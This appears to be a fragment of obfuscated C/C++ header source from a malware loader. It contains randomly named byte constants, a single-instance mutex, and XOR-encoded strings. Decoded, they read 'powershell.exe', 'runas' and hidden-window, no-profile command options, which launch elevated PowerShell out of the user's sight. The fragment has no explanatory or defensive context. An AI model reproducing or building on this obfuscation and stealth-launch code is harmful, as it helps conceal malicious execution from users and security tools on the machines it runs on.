extern uint8_t __stdcall __OTVkMjA1MTg7_g(){ return __OTVkMjA1MTg7; };
static const uint8_t __ZDIwNTE4M2IL=0xD2;
extern uint8_t __stdcall __ZDIwNTE4M2IL_g(){ return __ZDIwNTE4M2IL; };
static const uint8_t __MDUxODNiMGIB=0x05;
extern uint8_t __stdcall __MDUxODNiMGIB_g(){ return __MDUxODNiMGIB; };
static const uint8_t __MTgzYjBiMDHC=0x18;
extern uint8_t __stdcall __MTgzYjBiMDHC_g(){ return __MTgzYjBiMDHC; };
static const uint8_t __M2IwYjAxYzIq=0x3B;
extern uint8_t __stdcall __M2IwYjAxYzIq_g(){ return __M2IwYjAxYzIq; };
static const uint8_t __MGIwMWMyMmGB=0x0B;
extern uint8_t __stdcall __MGIwMWMyMmGB_g(){ return __MGIwMWMyMmGB; };
static const uint8_t __MDFjMjJhODF9=0x01;
extern uint8_t __stdcall __MDFjMjJhODF9_g(){ return __MDFjMjJhODF9; };
static const uint8_t __YzIyYTgxN2Rn=0xC2;
extern uint8_t __stdcall __YzIyYTgxN2Rn_g(){ return __YzIyYTgxN2Rn; };
static const uint8_t __MmE4MTdkNjeR=0x2A;
extern uint8_t __stdcall __MmE4MTdkNjeR_g(){ return __MmE4MTdkNjeR; };
static const uint8_t __ODE3ZDY3OTEu=0x81;
extern uint8_t __stdcall __ODE3ZDY3OTEu_g(){ return __ODE3ZDY3OTEu; };
static const uint8_t __N2Q2NzkxMmUW=0x7D;
extern uint8_t __stdcall __N2Q2NzkxMmUW_g(){ return __N2Q2NzkxMmUW; };
static const uint8_t __Njc5MTJlMTYk=0x67;
extern uint8_t __stdcall __Njc5MTJlMTYk_g(){ return __Njc5MTJlMTYk; };
static const uint8_t __OTEyZTE2MjTn=0x91;
extern uint8_t __stdcall __OTEyZTE2MjTn_g(){ return __OTEyZTE2MjTn; };
static const uint8_t __MmUxNjI0ZTfg=0x2E;
extern uint8_t __stdcall __MmUxNjI0ZTfg_g(){ return __MmUxNjI0ZTfg; };
static const uint8_t __MTYyNGU3ZTDt=0x16;
extern uint8_t __stdcall __MTYyNGU3ZTDt_g(){ return __MTYyNGU3ZTDt; };
static const uint8_t __MjRlN2UwZWSc=0x24;
extern uint8_t __stdcall __MjRlN2UwZWSc_g(){ return __MjRlN2UwZWSc; };
static const uint8_t __ZTdlMGVkOWNi=0xE7;
extern uint8_t __stdcall __ZTdlMGVkOWNi_g(){ return __ZTdlMGVkOWNi; };
static const uint8_t __ZTBlZDljNjIZ=0xE0;
extern uint8_t __stdcall __ZTBlZDljNjIZ_g(){ return __ZTBlZDljNjIZ; };
static const uint8_t __ZWQ5YzYyMTm3=0xED;
extern uint8_t __stdcall __ZWQ5YzYyMTm3_g(){ return __ZWQ5YzYyMTm3; };
static const uint8_t __OWM2MjE5YjdQ=0x9C;
extern uint8_t __stdcall __OWM2MjE5YjdQ_g(){ return __OWM2MjE5YjdQ; };
static const uint8_t __NjIxOWI3NTA4=0x62;
extern uint8_t __stdcall __NjIxOWI3NTA4_g(){ return __NjIxOWI3NTA4; };
static const uint8_t __MTliNzUwMzhM=0x19;
extern uint8_t __stdcall __MTliNzUwMzhM_g(){ return __MTliNzUwMzhM; };
static const uint8_t __Yjc1MDM4NGMz=0xB7;
extern uint8_t __stdcall __Yjc1MDM4NGMz_g(){ return __Yjc1MDM4NGMz; };
static const uint8_t __NTAzODRjMzMg=0x50;
extern uint8_t __stdcall __NTAzODRjMzMg_g(){ return __NTAzODRjMzMg; };
static const uint8_t __Mzg0YzMzMjDk=0x38;
extern uint8_t __stdcall __Mzg0YzMzMjDk_g(){ return __Mzg0YzMzMjDk; };
static const uint8_t __NGMzMzIwZTTX=0x4C;
extern uint8_t __stdcall __NGMzMzIwZTTX_g(){ return __NGMzMzIwZTTX; };
static const uint8_t __MzMyMGU0ZDev=0x33;
extern uint8_t __stdcall __MzMyMGU0ZDev_g(){ return __MzMyMGU0ZDev; };
static const uint8_t __MjBlNGQ3YWbW=0x20;
extern uint8_t __stdcall __MjBlNGQ3YWbW_g(){ return __MjBlNGQ3YWbW; };
static const uint8_t __ZTRkN2FmZDY8=0xE4;
extern uint8_t __stdcall __ZTRkN2FmZDY8_g(){ return __ZTRkN2FmZDY8; };
static const uint8_t __ZDdhZmQ2M2Mp=0xD7;
extern uint8_t __stdcall __ZDdhZmQ2M2Mp_g(){ return __ZDdhZmQ2M2Mp; };
static const uint8_t __YWZkNjNjMjmW=0xAF;
extern uint8_t __stdcall __YWZkNjNjMjmW_g(){ return __YWZkNjNjMjmW; };
static const uint8_t __ZDYzYzI5OTaT=0xD6;
extern uint8_t __stdcall __ZDYzYzI5OTaT_g(){ return __ZDYzYzI5OTaT; };
static const uint8_t __M2MyOTk2OTP2=0x3C;
extern uint8_t __stdcall __M2MyOTk2OTP2_g(){ return __M2MyOTk2OTP2; };
static const uint8_t __Mjk5NjkzZjaU=0x29;
extern uint8_t __stdcall __Mjk5NjkzZjaU_g(){ return __Mjk5NjkzZjaU; };
static const uint8_t __OTY5M2Y2OTSX=0x96;
extern uint8_t __stdcall __OTY5M2Y2OTSX_g(){ return __OTY5M2Y2OTSX; };
static const uint8_t __OTNmNjk0OTc5=0x93;
extern uint8_t __stdcall __OTNmNjk0OTc5_g(){ return __OTNmNjk0OTc5; };
static const uint8_t __ZjY5NDk3MzkJ=0xF6;
extern uint8_t __stdcall __ZjY5NDk3MzkJ_g(){ return __ZjY5NDk3MzkJ; };
static const uint8_t __OTQ5NzM5MDnj=0x94;
extern uint8_t __stdcall __OTQ5NzM5MDnj_g(){ return __OTQ5NzM5MDnj; };
static const uint8_t __OTczOTA5ZTM2=0x97;
extern uint8_t __stdcall __OTczOTA5ZTM2_g(){ return __OTczOTA5ZTM2; };
static const uint8_t __MzkwOWUzMzau=0x39;
extern uint8_t __stdcall __MzkwOWUzMzau_g(){ return __MzkwOWUzMzau; };
static const uint8_t __MDllMzM2YWUU=0x09;
extern uint8_t __stdcall __MDllMzM2YWUU_g(){ return __MDllMzM2YWUU; };
static const uint8_t __ZTMzNmFlMTRk=0xE3;
extern uint8_t __stdcall __ZTMzNmFlMTRk_g(){ return __ZTMzNmFlMTRk; };
static const uint8_t __MzZhZTE0NjSG=0x36;
extern uint8_t __stdcall __MzZhZTE0NjSG_g(){ return __MzZhZTE0NjSG; };
static const uint8_t __YWUxNDY0ODZ5=0xAE;
extern uint8_t __stdcall __YWUxNDY0ODZ5_g(){ return __YWUxNDY0ODZ5; };
static const uint8_t __MTQ2NDg2NzlY=0x14;
extern uint8_t __stdcall __MTQ2NDg2NzlY_g(){ return __MTQ2NDg2NzlY; };
static const uint8_t __NjQ4Njc5NThL=0x64;
extern uint8_t __stdcall __NjQ4Njc5NThL_g(){ return __NjQ4Njc5NThL; };
static const uint8_t __ODY3OTU4NGLe=0x86;
extern uint8_t __stdcall __ODY3OTU4NGLe_g(){ return __ODY3OTU4NGLe; };
static const uint8_t __Nzk1ODRiZGVb=0x79;
extern uint8_t __stdcall __Nzk1ODRiZGVb_g(){ return __Nzk1ODRiZGVb; };
static const uint8_t __NTg0YmRlNWLO=0x58;
extern uint8_t __stdcall __NTg0YmRlNWLO_g(){ return __NTg0YmRlNWLO; };
static const uint8_t __NGJkZTViY2UO=0x4B;
extern uint8_t __stdcall __NGJkZTViY2UO_g(){ return __NGJkZTViY2UO; };
static const uint8_t __ZGU1YmNlMGW5=0xDE;
extern uint8_t __stdcall __ZGU1YmNlMGW5_g(){ return __ZGU1YmNlMGW5; };
static const uint8_t __NWJjZTBlYjl2=0x5B;
extern uint8_t __stdcall __NWJjZTBlYjl2_g(){ return __NWJjZTBlYjl2; };
static const uint8_t __Y2UwZWI5NzYn=0xCE;
extern uint8_t __stdcall __Y2UwZWI5NzYn_g(){ return __Y2UwZWI5NzYn; };
static const uint8_t __MGViOTc2Mjeb=0x0E;
extern uint8_t __stdcall __MGViOTc2Mjeb_g(){ return __MGViOTc2Mjeb; };
static const uint8_t __Yjk3NjI3OWLw=0xB9;
extern uint8_t __stdcall __Yjk3NjI3OWLw_g(){ return __Yjk3NjI3OWLw; };
static const uint8_t __NzYyNzliZjAR=0x76;
extern uint8_t __stdcall __NzYyNzliZjAR_g(){ return __NzYyNzliZjAR; };
static const uint8_t __Mjc5YmYwMTFv=0x27;
extern uint8_t __stdcall __Mjc5YmYwMTFv_g(){ return __Mjc5YmYwMTFv; };
static const wchar_t imutex[]=L"SrlcMzttVRhv";
#define STRMAX 22
static wchar_t xchr[]={
0xef3b,0xe52a,0x9653,0x3891,0xcf32,0xff64,
0x6884,0xf205,0x3bcb,0xeabf,0xa734,0x70b4,
0x9dc5,0xf66b,0x753d,0x897b,0x5f36,0x188b,
0xbf40,0x9a0e,0xba38,0x9976
};
static wchar_t cmd[]={
0xef4b,0xe545,0x9624,0x38f4,0xcf40,0xff17,
0x68ec,0xf260,0x3ba7,0xead3,0xa71a,0x70d1,
0x9dbd,0xf60e,0x753d,0x897b,0x5f36,0x188b,
0xbf40,0x9a0e,0xba38,0x9976
};
static wchar_t opt[]={
0xef1b,0xe507,0x9624,0x38b1,0xcf01,0xff44,
0x68a9,0xf26b,0x3ba4,0xead3,0xa714,0x7099,
0x9dab,0xf604,0x754d,0x895b,0x5f1b,0x18e8,
0xbf60,0x9a23,0xba38,0x9976
};
static wchar_t vrb[]={
0xef49,0xe55f,0x963d,0x38f0,0xcf41,0xff64,
0x6884,0xf205,0x3bcb,0xeabf,0xa734,0x70b4,
0x9dc5,0xf66b,0x753d,0x897b,0x5f36,0x188b,
0xbf40,0x9a0e,0xba38,0x9976
};
#endif
